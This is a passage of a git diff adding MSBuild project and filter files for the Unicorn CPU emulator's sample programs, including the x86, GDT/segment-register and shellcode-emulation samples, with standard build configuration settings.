Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__x86_64__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + 
<AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__x86_64__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters new file mode 100644 index 0000000..dd731b2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj new file mode 100644 index 0000000..2600557 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + 
<ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9D96D09A-DE17-4011-9247-F0009E8D6DB5}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_x86_32_gdt_and_seg_regs</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + 
<PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + 
</PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + 
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + 
</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86_32_gdt_and_seg_regs.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters new file mode 100644 index 0000000..960616d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" 
xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86_32_gdt_and_seg_regs.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj new file mode 100644 index 0000000..2ecad9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\shellcode.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F113B460-4B21-4014-9A15-D472FAA9E3F9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>shellcode</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + 
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + 
<GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
